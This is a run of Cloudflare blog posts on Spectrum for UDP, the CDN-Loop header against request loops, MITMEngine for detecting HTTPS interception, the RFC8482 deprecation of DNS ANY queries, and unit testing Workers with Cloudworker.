CloudFlare Blog

Spectrum for UDP: DDoS protection and firewalling for unreliable protocols

Today, we're announcing Spectrum for UDP. Spectrum for UDP works the same as Spectrum for TCP: Spectrum sits between your clients and your origin. Incoming connections are proxied through, whilst applying our DDoS protection and IP Firewall rules. This allows you to protect your services from all sorts of nasty attacks and completely hides your origin behind Cloudflare.Last year, we launched Spectrum. Spectrum brought the power of our DDoS and firewall features to all TCP ports and services. Spectrum for TCP allows you to protect your SSH services, gaming protocols, and as of last month, even FTP servers. We’ve seen customers running all sorts of applications behind Spectrum, such as Bitfly, Nicehash, and Hypixel.This is great if you're running TCP services, but plenty of our customers also have workloads running over UDP. As an example, many multiplayer games prefer the low cost and lighter weight of UDP and don't care about whether packets arrive or not.UDP applications have historically been hard to protect and secure, which is why we built Spectrum for UDP. Spectrum for UDP allows you to protect standard UDP services (such as RDP over UDP), but can also protect any custom protocol you come up with! The only requirement is that it uses UDP as an underlying protocol.Configuring a UDP application on SpectrumTo configure on the dashboard, simply switch the application type from TCP to UDP:Retrieving client informationWith Spectrum, we terminate the connection and open a new one to your origin. But, what if you want to still see who's actually connecting to you? For TCP, there's Proxy Protocol. Whilst initially introduced by HAProxy, it has since been adopted by more parties, such as nginx. We added support late 2018, allowing you to easily read the client's IP and port from a header that precedes each data stream.Unfortunately, there is no equivalent for UDP, so we're rolling our own. Due to the fact that UDP is connection-less, we can't get away with the Proxy Protocol approach for TCP, which prepends the entire stream with one header. Instead, we are forced to prepend each packet with a small header that specifies:the original client IPthe Spectrum IPthe original client portthe Spectrum portSchema representing a UDP packet prefaced with our Simple Proxy Protocol header.0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Magic Number | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | | + + | | + Client Address + | | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | | + + | | + Proxy Address + | | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | | Client Port | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Proxy Port | Payload... | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Simple Proxy Protocol is turned off by default, which means UDP packets will arrive at your origin as if they were sent from Spectrum. To enable, just enable it on your Spectrum app.Getting access to Spectrum for UDPWe're excited about launching this and and even more excited to see what you'll build and protect with it. In fact, what if you could build serverless services on Spectrum, without actually having an origin running? Stay tuned for some cool announcements in the near future.Spectrum for UDP is currently an Enterprise-only feature. To get UDP enabled for your account, please reach out to your account team and we’ll get you set up. One more thing... if you’re at GDC this year, say hello at booth P1639! We’d love to talk more and learn about what you’d like to do with Spectrum.

Preventing Request Loops Using CDN-Loop

HTTP requests typically originate with a client, and end at a web server that processes the request and returns some response. Such requests may pass through multiple proxies before they arrive at the requested resource. If one of these proxies is configured badly (for instance, back to a proxy that had already processed it) then the request may be caught in a loop.Request loops, accidental or malicious, can consume resources and degrade user's Internet performance. Such loops can even be observed at the CDN-level. Such a wide-scale attack would affect all customers of that CDN. It's been over three years since Cloudflare acknowledged the power of such non-compliant or malicious request loops. The proposed solution in that blog post was quickly found to be flawed and loop protection has since been implemented in an ad-hoc manner that is specific to each individual provider. This lack of cohesion and co-operation has led to a fragmented set of protection mechanisms. We are finally happy to report that a recent collaboration between multiple CDN providers (including Cloudflare) has led to a new mechanism for loop protection. This now runs at the Cloudflare edge and is compliant with other CDNs, allowing us to provide protection against loops. The loop protection mechanism is currently a draft item being worked on by the HTTPbis working group. It will be published as an RFC in the standards track in the near future.The original problemThe original problem was summarised really nicely in the previous blog post, but I will summarise it again here (with some diagrams that are suspiciously similar to the original post, sorry Nick!).As you may well know, Cloudflare is a reverse proxy. When requests are made for Cloudflare websites, the Cloudflare edge returns origin content via a cached response or by making requests to the origin web server. Some Cloudflare customers choose to use different CDN providers for different facets of functionality. This means that requests go through multiple proxy services before origin content is received from the origin.This is where things can sometimes get messy, either through misconfiguration or deliberately. It's possible to configure multiple proxy services for a given origin in a loop. For example, an origin website could configure proxy A so that proxy B is the origin, and B such that A is the origin.Then any request sent to the origin would get caught in a loop between the two Proxies (see above). If such a loop goes undetected, then this can quickly eat the computing resources of the two proxies, especially if the request requires a lot of processing at the edge. In these cases, it is conceivable that such an attack could lead to a DoS on one or both of the proxy services. Indeed, a research paper from NDSS 2016 showed that such an attack was practical when leveraging multiple CDN providers (including Cloudflare) in the way method shown above.The original solutionThe previous blog post advocated using the Via header on HTTP requests to log the proxy services that had previously processed any previous request. This header is specified in RFC7230 and is purpose-built for providing request loop detection. The idea was that CDN providers would log each time a request came through their edge architecture in the Via header. Any request that arrived at the edge would be checked to see if it previously passed through the same CDN using the value of the Via header. If the header indicated that it had passed through before, then the request could be dropped before any serious processing had taken place.Nick’s previous post finished with a call-to-arms for all services proxying requests to be compliant with the standard.The problem with ViaIn theory, the Via header would solve the loop protection problem. In practice, it was quickly discovered there were issues with the implementation of Via that meant that using the header was infeasible. Adding the header to outbound requests from the Cloudflare edge had grave performance consequences for a large number of Cloudflare customers.Such issues arose from legacy usage of the Via header that conflicts with using it for tracking loop detection. For instance, around 8% of Cloudflare enterprise customers experienced issues where gzip failed to compress requests containing the Via header. This meant that transported requests were much larger and led to wide-scale problems for their web servers. Such performance degradation is even expected in some server implementations. For example, NGINX actively chooses not to compress proxied requests:By default, NGINX does not compress responses to proxied requests (requests that come from the proxy server). The fact that a request comes from a proxy server is determined by the presence of the Via header field in the request.While Cloudflare takes security very seriously, such performance issues were unacceptable. The difficult decision was taken to switch off loop protection based on the contents of the Via header shortly after it was implemented. Since then, Cloudflare has implemented loop protection based on the CF-Connecting-IP and X-Forwarded-For headers. In essence, when a request is processed by the edge these headers are added to the request before it is sent to the origin. Then, any request that is processed by the edge including either of these headers is dropped. While this is enough to avoid malicious loop attacks, there are some disadvantages with this approach.Firstly, this approach naturally means that there is no unified way of approaching loop protection across the different CDN providers. Without a standardised method, the possibility of mistakes in implementations that could cause problems in the future rises.Secondly, there are some valid reasons that Cloudflare customers may require requests to loop through the edge more than once.While such reasons are usually quite esoteric, customers with such a need had to manually modify such requests so that they did not fall foul of the loop protection mechanism. For example, workflows that include usage of Cloudflare Workers can send requests through the edge more than once via subrequests for returning custom content to clients. The headers that are currently used mean that requests are dropped as soon as a request loops once. This can add noticeable friction to using CDN services and it would be preferable to have a more granular solution to loop detection.A new solutionCollaborators at Cloudflare, Fastly and Akamai set about defining a unified solution to the loop protection problem for CDNs.The output was the following was this draft that has recently been accepted by the HTTPbis working group on the Standards Track. the document has been approved by the IESG, it will join the RFC series.The CDN-Loop header sets out a syntax that allows individual CDNs to mark requests as having been processed by their edge. This header should be added to any request that passes through the CDN architecture towards some separate endpoint. The current draft defines the syntax of the header to be the following:CDN-Loop = #cdn-info cdn-info = cdn-id *( OWS ";" OWS parameter ) cdn-id = ( uri-host [ ":" port ] ) / pseudonym pseudonym = token This initially seems a lot to unpack. Essentially, cdn-id is a URI host ID for the destination resource, or a pseudonym related to the CDN that has processed the request. In the Cloudflare case, we might choose pseudonym = cloudflare, or use the URI host ID for the origin website that has been requested.Then, cdn-info contains the cdn-id in addition to some optional parameters. This is denoted by *( OWS ";" OWS parameter ) where `OWS` represents optional whitespace, and parameter represents any CDN-specific information that may be informative for the specific request. If different CDN-specific cdn-info parameters are included in the same header, then these are comma-separated. For example, we may have cdn-info = cdn1; param1, cdn2; param2 for two different CDNs that have interacted with the request.Concretely, we give some examples to describe how the CDN-Loop header may be used by a CDN to mark requests as being processed.If a request arrives at CDN A that has no current CDN-Loop header. Then A processes the request and adds:CDN-Loop: cdn-info(A) to the request headers.If a request arrives at A with the following header:CDN-Loop: cdn-info(B) for some different CDN B, then A either modifies the header to be:CDN-Loop: cdn-info(B), cdn-info(A) or adds a separate header:CDN-Loop: cdn-info(B) CDN-Loop: cdn-info(A) If a request arrives at A with:CDN-Loop: cdn-info(A) this indicates that the request has already been processed. At this point A detects a loop and may implement loop protection in accordance with its own policies. This is an implementation decision that is not defined in the specification. Options may include dropping the request or simply re-marking it, for example:CDN-Loop: cdn-info(A); cdn-info(A) A CDN could also utilise the optional parameters to indicate that a request had been processed:CDN-Loop: cdn-info(A); processed=1 The ability to use different parameters in the header allows for much more granular loop detection and protection. For example, a CDN could drop requests that had previously looped N>1 times, rather than just once. In addition, the advantage of using the CDN-Loop header is that it does not come with legacy baggage.  As we experienced previously, loop detection based on the Via header can conflict with existing usage of the header in web server implementations that eventually lead to compression issues and performance degradation. This makes CDN-Loop a viable and effective solution for detecting loop-protection attacks and applying preventions where needed.Implementing CDN-Loop at CloudflareThe IETF standardisation process welcomes running code and implementation experience in the real world. Cloudflare recently added support for the CDN-Loop header to requests that pass through the Cloudflare edge. This replaces the CF-Connecting-IP and X-Forwarded-For headers as the primary means for establishing loop protection. The structure that Cloudflare uses is similar to the examples above, where cdn-info = cloudflare. Extra parameters can be added to the header to determine how many times a request has been processed and in what manner.The Cloudflare edge drops any requests that have been processed multiple times to prevent malicious loop attacks. In the diagram above, requests that have looped more times than is allowed by a given CDN (red arrows) are dropped and an error is returned to the client. The edge can decide to allow requests to loop more than once in certain situations, rather than dropping immediately after the first loop.A (second) call-to-armsCloudflare previously made a call-to-arms to make use of the Via header across the industry for preventing malicious usage of proxies for request looping. This did not turn out as we hoped for the reasons mentioned above. Using CDN-Loop, we believe that there is finally a way of allowing CDNs to block loop attacks in a standardised and generic manner that fits with other existing implementations.CDN-Loop is actively supported by Cloudflare and there have been none of the performance issues that came with the usage of Via. Recently, another CDN, Fastly introduced usage of the CDN-Loop header of the CDN-Loop header for their own edge-based loop protection. We believe that this could be the start of a wider movement and that it would be advantageous for all reverse proxies and CDN-like providers to implement compliant usage of the CDN-Loop header.While the original solution three years ago was very different, what Nick said at the time is still salient for all CDNs globally: Let’s work together to avoid request loops.Special thanks to Stephen Ludin, Mark Nottingham and Nick Sullivan for their work in drafting and improving the CDN-Loop specification. We would also like to extend thanks to HTTPbis working group for their advice during the standardisation process.

Monsters in the Middleboxes: Introducing Two New Tools for Detecting HTTPS Interception

The practice of HTTPS interception continues to be commonplace on the Internet. HTTPS interception has encountered scrutiny, most notably in the 2017 study “The Security Impact of HTTPS Interception” and the United States Computer Emergency Readiness Team (US-CERT)  warning that the technique weakens security. In this blog post, we provide a brief recap of HTTPS interception and introduce two new tools:MITMEngine, an open-source library for HTTPS interception detection, andMALCOLM, a dashboard displaying metrics about HTTPS interception we observe on Cloudflare’s network.In a basic HTTPS connection, a browser (client) establishes a TLS connection directly to an origin server to send requests and download content. However, many connections on the Internet are not directly from a browser to the server serving the website, but instead traverse through some type of proxy or middlebox (a “monster-in-the-middle” or MITM). There are many reasons for this behavior, both malicious and benign.Types of HTTPS Interception, as Demonstrated by Various Monsters in the MiddleOne common HTTPS interceptor is TLS-terminating forward proxies. (These are a subset of all forward proxies; non-TLS-terminating forward proxies forward TLS connections without any ability to inspect encrypted traffic). A TLS-terminating forward proxy sits in front of a client in a TLS connection, transparently forwarding and possibly modifying traffic from the browser to the destination server. To do this, the proxy must terminate the TLS connection from the client, and then (hopefully) re-encrypt and forward the payload to the destination server over a new TLS connection. To allow the connection to be intercepted without a browser certificate warning appearing at the client, forward proxies often require users to install a root certificate on their machine so that the proxy can generate and present a trusted certificate for the destination to the browser. These root certificates are often installed for corporate managed devices, done by network administrators without user intervention.Antivirus and Corporate ProxiesSome legitimate reasons for a client to connect through a forward proxy would be to allow antivirus software or a corporate proxy to inspect otherwise encrypted data entering and leaving a local network in order to detect inappropriate content, malware, and data breaches. The Blue Coat data loss prevention tools offered by Symantec are one example. In this case, HTTPS interception occurs to check if an employee is leaking sensitive information before sending the request to the intended destination.Malware ProxiesMalicious forward proxies, however, might insert advertisements into web pages or exfiltrate private user information. Malware like Superfish insert targeted ads into encrypted traffic, which requires intercepting HTTPS traffic and modifying the content in the response given to a client.Leaky ProxiesAny TLS-terminating forward proxy--whether it’s well-intentioned or not--also risks exposing private information and opens the door to spoofing. When a proxy root certificate is installed, Internet browsers lose the ability to validate the connection end-to-end, and must trust the proxy to maintain the security of the connection to ensure that sensitive data is protected. Some proxies re-encrypt and forward traffic to destinations using less secure TLS parameters. Proxies can also require the installation of vendor root certificates that can be easily abused by other malicious parties. In November 2018, a type of Sennheiser wireless headphones required the user to install a root certificate which used insecure parameters. This root certificate could allow any adversary to impersonate websites and send spoofed responses to machines with this certificate, as well as observe otherwise encrypted data. TLS-terminating forward proxies could even trust root certificates considered insecure, like Symantec’s CA. If poorly implemented, any TLS-terminating forward proxy can become a widespread attack vector, leaking private information or allowing for response spoofing.Reverse ProxiesReverse proxies also sit between users and origin servers. Reverse proxies (such as Cloudflare and Akamai) act on behalf of origin servers, caching static data to improve the speed of content delivery and offering security services such as DDoS mitigation. Critically, reverse proxies do not require special root certificates to be installed on user devices, since browsers establish connections directly to the reverse proxy to download content that is hosted at the origin server. Reverse proxies are often used by origin servers to improve the security of client HTTPS connections (for example, by enforcing strict security policies and using the newest security protocols like TLS 1.3). In this case, reverse proxies are intermediaries that provide better performance and security to TLS connections.Why Continue Examining HTTPS Interception?In a previous blog post, we argued that HTTPS interception is prevalent on the Internet and that it often degrades the security of Internet connections. A server that refuses to negotiate weak cryptographic parameters should be safe from many of the risks of degraded connection security, but there are plenty of reasons why a server operator may want to know if HTTPS traffic from its clients has been intercepted.First, detecting HTTPS interception can help a server to identify suspicious or potentially vulnerable clients connecting to its network. A server can use this knowledge to notify legitimate users that their connection security might be degraded or compromised. HTTPS interception also increases the attack surface area of the system, and presents an attractive target for attackers to gain access to sensitive connection data.Second, the presence of content inspection systems can not only weaken the security of TLS connections, but it can hinder the adoption of new innovations and improvements to TLS.  Users connecting through older middleboxes may have their connections downgraded to older versions of TLS the middleboxes still support, and may not receive the security, privacy, and performance benefits of new TLS versions, even if newer versions are supported by both the browser and the server.Introducing MITMEngine: Cloudflare’s HTTPS Interception DetectorMany TLS client implementations can be uniquely identified by features of the Client Hello message such as the supported version, cipher suites, extensions, elliptic curves, point formats, compression, and signature algorithms. The technique introduced by “The Security Impact of HTTPS Interception” is to construct TLS Client Hello signatures for common browser and middlebox implementations. Then, to identify HTTPS requests that have been intercepted, a server can look up the signature corresponding to the request’s HTTP User Agent, and check if the request’s Client Hello message matches the signature. A mismatch indicates either a spoofed User Agent or an intercepted HTTPS connection. The server can also compare the request’s Client Hello to those of known HTTPS interception tools to understand which interceptors are responsible for intercepting the traffic.The Caddy Server MITM Detection tool is based on these heuristics and implements support for a limited set of browser versions. However, we wanted a tool that could be easily applied to the broad set of TLS implementations that Cloudflare supports, with the following goals:Maintainability: It should be easy to add support for new browsers and to update existing browser signatures when browser updates are released.Flexibility: Signatures should be able to capture a wide variety of TLS client behavior without being overly broad. For example, signatures should be able to account for the GREASE values sent in modern versions of Chrome.Performance: Per-request MITM detection should be cheap so that the system can be deployed at scale.To accomplish these goals, the Cryptography team at Cloudflare developed MITMEngine, an open-source HTTPS interception detector. MITMEngine is a Golang library that ingests User Agents and TLS Client Hello fingerprints, then returns the likelihood of HTTPS interception and the factors used to identify interception. To learn how to use MITMEngine, check out the project on GitHub.MITMEngine works by comparing the values in an observed TLS Client Hello to a set of known browser Client Hellos. The fields compared include:TLS version,Cipher suites,Extensions and their values,Supported elliptic curve groups, andElliptic curve point formats.When given a pair of User Agent and observed TLS Client Hello, MITMEngine detects differences between the given Client Hello and the one expected for the presented User Agent. For example, consider the following User Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 This User Agent corresponds to Chrome 47 running on Windows 7. The paired TLS Client Hello includes the following cipher suites, displayed below as a hex dump:0000 c0 2b c0 2f 00 9e c0 0a c0 14 00 39 c0 09 c0 13 .+./.... ...9.... 0010 00 33 00 9c 00 35 00 2f 00 0a .3...5./ .. These cipher suites translate to the following list (and order) of 13 ciphers:TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 (0xc02b) TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xc02f) TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (0x009e) TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (0xc00a) TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014) TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039) TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (0xc009) TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013) TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033) TLS_RSA_WITH_AES_128_GCM_SHA256 (0x009c) TLS_RSA_WITH_AES_256_CBC_SHA (0x0035) TLS_RSA_WITH_AES_128_CBC_SHA (0x002f) TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000a) The reference TLS Client Hello cipher suites for Chrome 47 are the following:0000 c0 2b c0 2f 00 9e cc 14 cc 13 c0 0a c0 14 00 39 .+./.... .......9 0010 c0 09 c0 13 00 33 00 9c 00 35 00 2f 00 0a .....3.. .5./.. Looking closely, we see that the cipher suite list for the observed traffic is shorter than we expect for Chrome 47; two cipher suites have been removed, though the remaining cipher suites remain in the same order. The two missing cipher suites areTLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 (0xcc14) TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 (0xcc13) Chrome prioritizes these two ChaCha ciphers above AES-CBC ciphers--a good choice, given that CBC (cipher block chaining) mode is vulnerable to padding oracle attacks. It looks like the traffic we received underwent HTTPS interception, and the interceptor potentially didn't support ChaCha ciphers.Using contextual clues like the used cipher suites, as well as additional User Agent text, we can also detect which software was used to intercept the HTTPS connection. In this case, MITMEngine recognizes that the fingerprint observed actually matches a fingerprint collected from Sophos antivirus software, and indicates that this software is likely the cause of this interception.We welcome contributions to MITMEngine. We are particularly interested in collecting more fingerprints of MITM software and browser TLS Client Hellos, because MITMEngine depends on these reference fingerprints to detect HTTPS interception. Contributing these fingerprints is as simple as opening Wireshark, capturing a pcap file with a TLS Client Hello, and submitting the pcap file in a PR. More instructions on how to contribute can be found in the MITMEngine documentation.Observing HTTPS Interception on Cloudflare’s Network with MALCOLMTo complement MITMEngine, we also built a dashboard, MALCOLM, to apply MITMEngine to a sample of Cloudflare’s overall traffic and observe HTTPS interception in the requests hitting our network. Recent MALCOLM data incorporates a fresh set of reference TLS Client Hellos, so readers will notice that percentage of "unknown" instances of HTTPS interception has decreased from Feburary 2019 to March 2019.In this section of this blog post, we compare HTTPS interception statistics from MALCOLM to the 2017 study “The Security Impact of HTTPS Interception”. With this data, we can see the changes in HTTPS interception patterns observed by Cloudflare over the past two years.Using MALCOLM, let’s see how HTTPS connections have been intercepted as of late. This MALCOLM data was collected between March 12 and March 13, 2019. The 2017 study found that 10.9% of Cloudflare-bound TLS Client Hellos had been intercepted. MALCOLM shows that the number of interceptions has increased by a substantial amount, to 18.6%:This result, however, is likely inflated compared to the results of the 2017 study. The 2017 study considered all traffic that went through Cloudflare, regardless of whether it had a recognizable User Agent or not. MALCOLM only considers results with recognizable User Agents that could be identified by uasurfer, a Golang library for parsing User Agent strings. Indeed, when we don’t screen out TLS Client Hellos with unidentified User Agents, we see that 11.3% of requests are considered intercepted--an increase of 0.4%. Overall, the prevalence of HTTPS interception activity does not seem to have changed much over the past two years.Next, we examine the prevalence of HTTPS interception by browser and operating system. The paper presented the following table. We’re interested in finding the most popular browsers and most frequently intercepted browsers.MALCOLM yields the following statistics for all traffic by browsers. MALCOLM presents mobile and desktop browsers as a single item. This can be broken into separate views for desktop and mobile using the filters on the dashboard.Chrome usage has expanded substantially since 2017, while usage of Safari, IE, and Firefox has fallen somewhat (here, IE includes Edge). Examining the most frequently intercepted browsers, we see the following results:We see above that Chrome again accounts for a larger percentage of intercepted traffic, likely given growth in Chrome’s general popularity. As a result, HTTPS interception rates for other browsers, like Internet Explorer, have fallen as IE is less frequently used. MALCOLM also highlights the prevalence of other browsers that have their traffic intercepted--namely, UCBrowser, a browser common in China. Now, we examine the most common operating systems observed in Cloudflare’s traffic:Android use has clearly increased over the past two years as smartphones become peoples’ primary device for accessing the Internet. Windows also remains a common operating system.As Android becomes more popular, the likelihood of HTTPS interception occurring on Android devices also has increased substantially:Since 2017, Android devices have overtaken those of Windows as the most intercepted.As more of the world’s Internet consumption occurs through mobile devices, it’s important to acknowledge that simply changing platforms and browsers has not impacted the prevalence of HTTPS interception.ConclusionUsing MITMEngine and MALCOLM, we’ve been able to continuously track the state of HTTPS interception on over 10% of Internet traffic. It’s imperative that we track the status of HTTPS interception to give us foresight when deploying new security measures and detecting breaking changes in security protocols. Tracking HTTPS interception also helps us contribute to our broader mission of “helping to build a better Internet” by keeping tabs on software that possibly weakens good security practices.Interested in exploring more HTTPS interception data? Here are a couple of next steps:Check out MALCOLM, click on a couple of percentage bars to apply filters, and share any interesting HTTPS interception patterns you see!Experiment with MITMEngine today, and see if TLS connections to your website have been impacted by HTTPS interception.Contribute to MITMEngine!

RFC8482 - Saying goodbye to ANY

Ladies and gentlemen, I would like you to welcome the new shiny RFC8482, which effectively deprecates the DNS ANY query type. DNS ANY was a "meta-query" - think of it as a similar thing to the common A, AAAA, MX or SRV query types, but unlike these it wasn't a real query type - it was special. Unlike the standard query types, ANY didn't age well. It was hard to implement on modern DNS servers, the semantics were poorly understood by the community and it unnecessarily exposed the DNS protocol to abuse. RFC8482 allows us to clean it up - it's a good thing. But let's rewind a bit. Historical context It all started in 2015, when we were looking at the code of our authoritative DNS server. The code flow was generally fine, but it was all peppered with naughty statements like this: if qtype == "ANY" { // special case } This special code was ugly and error prone. This got us thinking: do we really need it? "ANY" is not a popular query type - no legitimate software uses it (with the notable exception of qmail). Image by Christopher MichelCC BY 2.0 ANY is hard for modern DNS servers "ANY" queries, also called "* queries" in old RFCs, are supposed to return "all records" (citing RFC1035). There are two problems with this notion. First, it assumes the server is able to retrieve "all records". In our implementation - we can't. Our DNS server, like many modern implementations, doesn't have a single "zone" file listing all properties of a DNS zone. This design allows us to respond fast and with information always up to date, but it makes it incredibly hard to retrieve "all records". Correct handling of "ANY" adds unreasonable code complexity for an obscure, rarely used query type. Second, many of the DNS responses are generated on-demand. To mention just two use cases: Some of our DNS responses are based on location We are using black lies and DNS shotgun for DNSSEC Storing data in modern databases and dynamically generating responses poses a fundamental problem to ANY. ANY is hard for clients Around the same time a catastrophe happened - Firefox started shipping with DNS code issuing "ANY" types. The intention was, as usual, benign. Firefox developers wanted to get the TTL value for A and AAAA queries. To cite a DNS guru Andrew Sullivan: In general, ANY is useful for troubleshooting but should never be used for regular operation. Its output is unpredictable given the effects of caches. It can return enormous result sets. In user code you can't rely on anything sane to come out of an "ANY" query. While an "ANY" query has somewhat defined semantics on the DNS authoritative side, it's undefined on the DNS resolver side. Such a query can confuse the resolver: Should it forward the "ANY" query to authoritative? Should it respond with any record that is already in cache? Should it do some a mixture of the above behaviors? Should it cache the result of "ANY" query and re-use the data for other queries? Different implementations do different things. "ANY" does not mean "ALL", which is the main source of confusion. To our joy, Firefox quickly backpedaled on the change and stopped issuing ANY queries. ANY is hard for network operators A typical 50Gbps DNS amplification targeting one of our customers. The attack lasted about 4 hours. Furthermore, since the "ANY" query can generate a large response, they were often used for DNS reflection attacks. Authoritative providers receive a spoofed ANY query and send the large answer to a target, potentially causing DoS damage. We have blogged about that many times: The DDoS that knocked Spamhaus offline Deep inside a DNS amplification attack Reflections on reflections How the CPSC is inadvertently behind the largest attacks The DoS problem with ANY is really old. Here is a discussion about a patch to bind tweaking ANY from 2013. There is also a second angle to the ANY DoS problem. Some reports suggested that performant DNS servers (authoritative or resolvers) can fill their outbound network capacity with a large number of ANY responses. The recommendation is simple - network operators must use "response rate limiting" when answering large DNS queries, otherwise they pose a DoS threat. The "ANY" query type just happens to often give such large responses, while providing little value to legitimate users. Killing ANY In 2015 frustrated with the experience we announced we would like to stop giving responses to "ANY" queries and wrote a (controversial at a time) blog post: Deprecating DNS ANY meta-query type A year later we followed up explaining possible solutions: What happened next - the deprecation of ANY And here we come today! With RFC8482 we have an RFC proposed standard clarifying that controversial query. ANY queries are a background noise. Under normal circumstances, we see a very small volume of ANY queries. The future for our users What precisely can be done about "ANY" queries? RFC8482 specifies that: A DNS responder that receives an ANY query MAY decline to provide a conventional ANY response or MAY instead send a response with a single RRset (or a larger subset of available RRsets) in the answer section. This clearly defines the corner case - from now on the authoritative server may respond with, well, any query type to an "ANY" query. Sometimes simple stuff like this matters most. This opens a gate for implementers - we can prepare a simple answer to these queries. As an implementer you may stick "A", or "AAAA" or anything else in the response if you wish. Furthermore, the spec recommends returning a special (and rarely used thus far) HINFO type. This is in fact what we do: $ dig ANY ;; ANSWER SECTION: 3789 IN HINFO "ANY obsoleted" "See draft-ietf-dnsop-refuse-any" Oh, we need to update the message to mention the fresh RFC number! NS1 agrees with our implementation: $ dig ANY ;; ANSWER SECTION: 3600 IN HINFO "ANY not supported." "See draft-ietf-dnsop-refuse-any" Our ultimate hero is, which does exactly what the RFC recommends: $ dig ANY ;; ANSWER SECTION: 3600 IN HINFO "RFC8482" "" On our resolver service we stop ANY queries with NOTIMP code. This makes us more confident the resolver isn't used to perform DNS reflections: $ dig ANY @ ;; ->>HEADER<<- opcode: QUERY, status: NOTIMP, id: 14151 The future for developers On the client side, just don't use ANY DNS queries. On the DNS server side - you are allowed to rip out all the gory QTYPE::ANY handling code, and replace it with a top level HINFO message or first RRset found. Enjoy cleaning your codebase! Summary It took the DNS community some time to agree on the specifics, but here we are at the end. RFC8482 cleans up the last remaining DNS meta-qtype, and allows for simpler DNS authoritative and DNS resolver implementations. It finally clearly defines the semantics of ANY queries going through resolvers and reduces the DoS risk for the whole Internet. Not all the effort must go to new shiny protocols and developments, sometimes, cleaning the bitrot is as important. Similar cleanups are being done in other areas. Keep up the good work! We would like to thank the co-authors of RFC8482, and the community scrutiny and feedback. For us, RFC8482 is definitely a good thing, and allowed us to simplify our codebase and make the Internet safer. Mission accomplished! One step at a time we can help make the Internet a better place.

Unit Testing Worker Functions

If you were not aware, Cloudflare Workers lets you run Javascript in all 165+ of our Data Centers. We’re delighted to see some of the creative applications of Workers. As the use cases grow in complexity, the need to sanity check your code also grows.  More specifically, if your Worker includes a number of functions, it’s important to ensure each function does what it’s intended to do in addition to ensuring the output of the entire Worker returns as expected.In this post, we’re going to demonstrate how to unit test Cloudflare Workers, and their individual functions, with Cloudworker, created by the Dollar Shave Club engineering team. Dollar Shave Club is a Cloudflare customer, and they created Cloudworker, a mock for the Workers runtime, for testing purposes. We’re really grateful to them for this. They were kind enough to post on our blog about it.This post will demonstrate how to abstract away Cloudworker, and test Workers with the same syntax you write them in. Example ScriptBefore we get into configuring Cloudworker, let’s introduce the simple script we are going to test against in our example. As you can see this script contains two functions, both of which contribute to the response to the client.addEventListener('fetch', event => { event.respondWith(handleRequest(event.request)) }) async function addition(a, b) { return a + b } async function handleRequest(request) { const added = await addition(1,3) return new Response(`The Sum is ${added}!`) } This script will be active for the route Set UpAfter I’ve created a new npm ( npm init ) project in a new directory, I placed my worker.js file inside, containing the above, and created the folder test which contains worker-test.js. The structure is laid out below.. ----- worker.js ----- test . worker-test.js ----- node_modules ----- package.json ----- package-lock.json. Next I need to install Cloudworker ( npm install @dollarshaveclub/cloudworker --save-dev ) and the Mocha testing framework ( npm install mocha --save-dev ) if you do not have it installed globally. Make sure that package.json reflects a value of mocha for tests, like:"scripts": { "test": "mocha" } Now we can finally write some tests! Luckily, mocha has async/await support which is going to make this very simple.  The idea is straightforward: Cloudworker allows you to place a Worker in development in front of an HTTP request and inspect the response.Writing Tests!Before any test logic, we’ll place two lines at the top of the test file ( worker-test.js ). The first line assigns all property values from Cloudworker and our Worker script to the global context before every async function() is run in mocha. The second line requires assert, which is commonly used to compare an expected output to a mocked output.before(async function () { Object.assign(global, new (require('@dollarshaveclub/cloudworker'))(require('fs').readFileSync('worker.js', ‘utf8’)).context); }); // You will replace worker.js with the relative path to your worker const assert = require('assert') Now, testing looks a lot more like a Worker itself as we access to all the underlying functions used by Cloudworker AND the Worker script.describe('Worker Test', function() { it('returns a body that says The Sum is 4', async function () { let url = new URL('') let req = new Request(url) let res = await handleRequest(req) let body = await res.text() assert.equal(body, 'The Sum is 4!') }) it('does addition properly', async function() { let res = await addition(1, 1) assert.equal(res, 2) }) }) We can test individual functions with our Worker this way, as shown above with the addition() function call. This is really powerful and allows for more confidence when deploying complex workers as you can test each component that makes up the script. We hope this was useful and welcome any feedback.

Reflecting on my first year as Head of Cloudflare Asia

